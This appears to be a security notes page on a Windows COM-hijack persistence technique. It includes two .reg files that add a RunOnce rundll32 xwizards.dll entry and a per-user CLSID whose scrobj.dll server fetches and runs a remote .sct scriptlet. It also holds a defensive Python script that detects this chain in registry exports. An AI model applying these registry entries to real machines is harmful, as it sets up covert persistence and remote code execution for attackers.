https://twitter.com/harr0ey/status/1052405330402074624
https://gist.github.com/homjxi0e/66555fedc78af49635b2e5dfea9dd1ae
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\setup]
@="rundll32 xwizards.dll,RunPropertySheet /u {00000001-0000-0000-0000-0000FEEDACDC}"
"COM Hijacking"=""

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
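The chain in the two .reg files above, as an added triage check (example code, not from the page or from harr0ey's gist): HKCU\Software\Classes is merged into HKCR ahead of HKLM\Software\Classes, so the per-user CLSID registration is the one that `rundll32 xwizards.dll,RunPropertySheet /u {CLSID}` resolves at logon; its InprocServer32 is scrobj.dll, which reads the ScriptletURL subkey and executes the remote .sct. The script below parses exported .reg text (a `reg export` or an offline hive dump) and flags each link of that chain separately, then correlates a Run/RunOnce entry with a CLSID that only the user hive defines. The rule names, the finding format and the sample export are this example's own constructions. One caveat for defenders: elevated (high-integrity) processes ignore per-user COM registrations, so the hijack only fires for medium-integrity activation such as the logon-time RunOnce shown here.

```python
"""Offline triage of exported .reg text for the RunOnce + per-user COM hijack chain.

Added example; not code from the original page or from harr0ey's gist.  The rule
names and the finding format are this example's own choices."""
import re

# Constructed sample input: the two .reg files from the page, concatenated.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\setup]
@="rundll32 xwizards.dll,RunPropertySheet /u {00000001-0000-0000-0000-0000FEEDACDC}"
"COM Hijacking"=""

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
"""

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
CLSID_RE = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}')
USER_CLASSES = 'hkey_current_user\\software\\classes\\'


def _unquote(s):
    """Strip the surrounding quotes of a .reg string and undo its \\ and \" escapes."""
    return re.sub(r'\\(.)', r'\1', s[1:-1])


def parse_reg(text):
    """Return {key_path: {value_name: value}}; the default value is stored under ''.
    Only string values are decoded; dword:/hex: payloads are kept verbatim."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';') or line.startswith('Windows Registry Editor'):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = '' if m.group(1) == '@' else _unquote(m.group(1))
            data = m.group(2)
            keys[current][name] = _unquote(data) if data.startswith('"') and data.endswith('"') else data
    return keys


def scan_reg(text):
    """Apply the hijack-chain rules to parsed .reg text and return a list of findings."""
    keys = parse_reg(text)
    findings = []
    user_clsids = set()      # CLSIDs registered in the user's hive
    autorun_clsids = set()   # CLSIDs referenced by autorun rundll32 commands
    for path, values in keys.items():
        low = path.lower()
        last = low.rsplit('\\', 1)[-1]
        # 1. Run / RunOnce / RunOnce\Setup value launching rundll32 into xwizards.dll.
        if '\\microsoft\\windows\\currentversion\\run' in low:
            for name, data in values.items():
                if 'xwizards.dll' in data.lower() and 'runpropertysheet' in data.lower():
                    autorun_clsids.update(c.lower() for c in CLSID_RE.findall(data))
                    findings.append({'rule': 'autorun_rundll32_xwizards', 'key': path, 'value': name, 'detail': data})
        # 2-3. Per-user CLSID registrations shadow HKLM in HKCR, so a user-writable
        # key decides which server a CLSID loads; scrobj.dll + ScriptletURL = remote .sct.
        if low.startswith(USER_CLASSES + 'clsid\\'):
            m = CLSID_RE.search(path)
            if m:
                user_clsids.add(m.group(0).lower())
            if last == 'scriptleturl' and values.get(''):
                findings.append({'rule': 'user_clsid_scriptleturl', 'key': path, 'value': '', 'detail': values['']})
            if last == 'inprocserver32' and values.get('', '').lower().endswith('scrobj.dll'):
                findings.append({'rule': 'user_clsid_scrobj_inproc', 'key': path, 'value': '', 'detail': values['']})
        # 4. A ProgID under HKCU\Software\Classes remapped to a CLSID by the user.
        elif low.startswith(USER_CLASSES) and last == 'clsid' and CLSID_RE.fullmatch(values.get('', '')):
            findings.append({'rule': 'user_progid_override', 'key': path, 'value': '', 'detail': values['']})
    # 5. Correlate: an autorun pointing at a CLSID that the user hive (re)defines.
    for clsid in sorted(autorun_clsids & user_clsids):
        findings.append({'rule': 'autorun_clsid_in_user_hive', 'key': '', 'value': '', 'detail': clsid})
    return findings


if __name__ == '__main__':
    for f in scan_reg(SAMPLE_REG):
        print(f"{f['rule']:<28} {f['key'] or '(correlation)'}  {f['detail']}")
```

Run it against `reg export HKCU\Software\Classes` plus `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` output; the individual rules are noisy on their own (a per-user ProgID is legitimate for per-user installs), so treat `autorun_clsid_in_user_hive` and `user_clsid_scriptleturl` as the high-confidence signals and the rest as context.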
2 prncnfg.vbs
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\prncnfg.vbs /?
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prncnfg.vbs /?
https://twitter.com/harr0ey/status/1137443710197817344